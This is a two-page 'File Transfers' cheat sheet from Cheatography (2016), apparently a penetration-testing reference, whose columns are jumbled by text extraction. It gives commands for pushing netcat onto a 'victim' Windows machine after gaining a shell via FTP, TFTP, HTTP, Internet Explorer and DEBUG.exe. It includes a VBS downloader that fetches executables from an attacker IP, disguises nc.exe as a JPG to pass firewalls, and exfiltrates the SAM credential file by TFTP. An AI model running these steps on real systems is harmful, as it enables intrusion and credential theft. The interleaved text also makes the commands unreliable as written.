File Transfers Cheat Sheet by fred via cheatography.com/22666/cs/9067/ Info Netcat FTP Upload (cont) Internet Explorer Check Transfer Progress nc -lvp 12345 | tar -xf Victim (Window​ s) Can be good for bypassing http://​ www​ .cy​ ber​ cit​ i.bi​ z/​ ope​ n-‐​ - (on receiver) After getting a shell: Firewalls sour​ ce/​ com​ man​ d-l​ ine​ -ha​ cks​ /pv​ - tar -cf - filenam​ e.txt | echo open 192.168​ .34.10 mv nc.exe to nc.jpg (exe co​ mma​ nd-​ exa​ mples/ nc -vn 192.168​ .1.14 > ftp.txt (commands to be files will open a dialog, so they 12345 (on sender) run in the -s step) need to be converted) DEBUG.exe Note: You will have no echo myftp>> ftp.txt (no ./abil​ ity​ -li​ nux (gain your Note: Uploaded file cannot be indication of file progress. just space between username and remote shell) larger than 64-bytes. UPX can wait a period of time then append command) cd prog* be used to compress files. CTRL+C echo myftp>> ftp.txt cd internet* locate exe2bat​ .exe http://​ www​ .g-​ loa​ ded​ .eu​ /2‐​ echo bin >> ftp.txt start iexplor​ e.exe wine exe2bat​ .exe 006/​ 11/​ 06/​ net​ cat​ -a-​ cou​ ple​ -of​ -u‐​ echo get nc.exe >> http://​ 192​ .16​ 8.8.17​ 3/‐​ upx -9 nc.exe (to compress sefu​ l-e​ xam​ ples/ ftp.txt nc.jpg` (nc.jpg will be nc.exe) echo bye >> ftp.txt downloaded to temp ls -l nc.exe (should now be FTP - Windows ftp -s:ftp.txt (-s run directory) smaller) Connect to an ftp server on port commands in ftp.txt) Navigate to the wine exe2bat​ .exe /root/‐​ 80 temporary internet files nc.exe nc.txt (convert ftp FTP - Pure-FTPD on the victim (e.g. nc.exe to nc.txt) open x.x.x.x 80 /etc/i​ nit​ .d/​ pur​ e-ftpd c:\docu​ ments and settin‐​ cat nc.txt | more (should Connect using commands in start (start ftp server) gs\​ offs​ ec\​ local settin‐​ be a hex dump) config.txt netstat -antp (confirm gs\​ temp​ orary internet ​ Near the end of nc.txt, exe2bat ftp -n -v -s:config.txt server on port 21) files) tells the debugger on the 10.2.10​ .14 /etc/i​ nit​ .d/​ pur​ e-ftpd copy nc.jpg c:\ windows victim to create an exe config​ .txt: stop (stop ftp server) cd\ Gain your shell using your usual user uid1234 (username) ls -l /ftphome (home ftp rename nc.jpg nc.exe exploit then copy and paste the uid1234 (password) directory created by ftpd) nc.exe (nc should be contents of nc.txt into the remote quit cp nc.exe /ftphome (copy functio​ nal) shell. If it fails, re-run any failed netcat to ftphome) commands manually. nc.exe will FTP Upload ftp 127.0.0.1 (login ftp to down.vbs now be created on the victim Outbound FTP is usually server) machine. 'Barabas pure vbs downloader - allowed in companies. ls (netcat should appear) tested on XP sp2 Kali bin (switch to binary for file Python 'Microsoft fixed adodbst​ ream but pure-pw useradd hacker - transfer) guess what :) Victim u ftpusers -d /ftphome/ get nc.exe (confirm file '(c)dec 2004 python -m SimpleH​ TTP​ Se‐​ (create user hacker) transfer works) 'First argument = complete url to rver pure-pw mkdb bye download Attac​ ker cp /pentes​ t/w​ ind​ ows​ /n‐​ file nc.exe (confirm file 'Second Argument = filename Browse to victim from attacking c.exe /ftphome properties are intact) you want to save machine for a directory listing /etc/i​ nit​ .d/​ pur​ e-ftpd 'thnks to http://​ www​ .er​ icp​ he‐​ start lps.com​ /sc​ rip​ tin​ g/s​ amp​ les​ /Bi​ na‐​ ​ ​ ftp 127.0.0.1 (test login) ryDownload/ ' ls (nc.exe should appear) 'v2 - now includes proxy support bye for the winhttp request stuff By fred Published 9th September, 2016. Sponsored by Readable.com cheatography.com/fred/ Last updated 9th September, 2016. Measure your website readability! Page 1 of 2. https://readable.com File Transfers Cheat Sheet by fred via cheatography.com/22666/cs/9067/ down.vbs (cont) VBS Download (with TFTP (cont) down.vbs) (cont) strUrl = WScript​ .Ar​ gum​ ent​ s.I‐​ Download from Attacker tem(0) nc.exe (check if file is functi‐​ Kali StrFile = WScript​ .Ar​ gum​ ent​ s.I‐​ onal) atftpd --daemon --port tem(1) 69 /tmp 'WinHtt​ pRe​ quest proxy settings. TFTP Server /usr/s​ har​ e/w​ ind​ ows​ -b‐​ Const HTTPREQ​ UES​ T_P​ RO‐​ Kali inar​ ies​ /nc​ .exe /tmp XYSE​ TTING_ apt-get install atftpd chmod 777 /tmp/nc​ .exe DEFAULT = 0 atftpd --daemon --port Windo​ ws Const HTTPREQ​ UES​ T_P​ RO‐​ 69 /tmp (start in daemon Initiate your remote shell to the XYSE​ TTI​ NG_​ PRE​ CONFIG = 0 mode on port 69, home directory Windows PC using your exploit: Const HTTPREQ​ UES​ T_P​ RO‐​ ​ ​ ​ ​ /tmp) ./ability-linux.py (ability XYSE​ TTI​ NG_​ DIRECT = 1 atftpd --daemon --port exploit, served, shell started) 1234 /tmp (start in daemon `cd` VBS Download (with tftp -i 192.168​ .23.10 mode on port 1234, home down.vbs) directory /tmp) GET nc.exe (on Windows cat down.vbs (confirm netstat -anup | grep Victim, IP = Kali) contents) atftp (should be listening on Upload to Attacker sed ’s/^echo /‘ downlo‐​ tftp -i 192.168​ .8.172 port 69 udp) ad-v​ bsc​ ript (add echo to cp /nc.exe /tmp PUT sam start of lines) Downl​ oading in Linux sam should now appear in /tmp sed ’s/^echo /‘ downlo‐​ tftp 127.0.0.1 (connect to on the Kali machine ad-v​ bsc​ ript | sed ’s/S/ Download in Windows server) tftp get 2.3.5.1:​ /l​ an‐​ >> down.vbs/‘ (add append get nc.exe scan (get the file lanscan from to end of lines) quit sed ’s/^echo /‘ downlo‐​ TFTP server 2.3.5.1) ls -l nc.exe ad-v​ bsc​ ript | sed ’s/S/ file nc.exe >> down.vbs/‘ | grep -v Kill Server ‘echo >> down.dbs’ ps -ef | grep atftp (remove echo on blank lines) kill -9 16084 (first column /etc/i​ nit​ .d/​ apa​ che2 number) start netstat -anup | grep 69 cp nc.exe /var/www/ (confirm server has been killed) After getting a shell on your Victim: TFTP Copy and paste the text output Note: Most corporate firewalls of the final sed command above will block outbound traffic and hit enter to create down.vbs. rendering TFTP unusable. TFTP cscript down.vbs might not be on Windows http://​ 192​ .16​ 8.8.17​ 3/‐​ machines. Files transfe​ rred will nc.exe nc2.exe (to run usually be read only. Change down.vbs, which will download attrib of file to delete using attrib nc.exe to nc2.exe) -r filename. By fred Published 9th September, 2016. Sponsored by Readable.com cheatography.com/fred/ Last updated 9th September, 2016. Measure your website readability! Page 2 of 2. https://readable.com.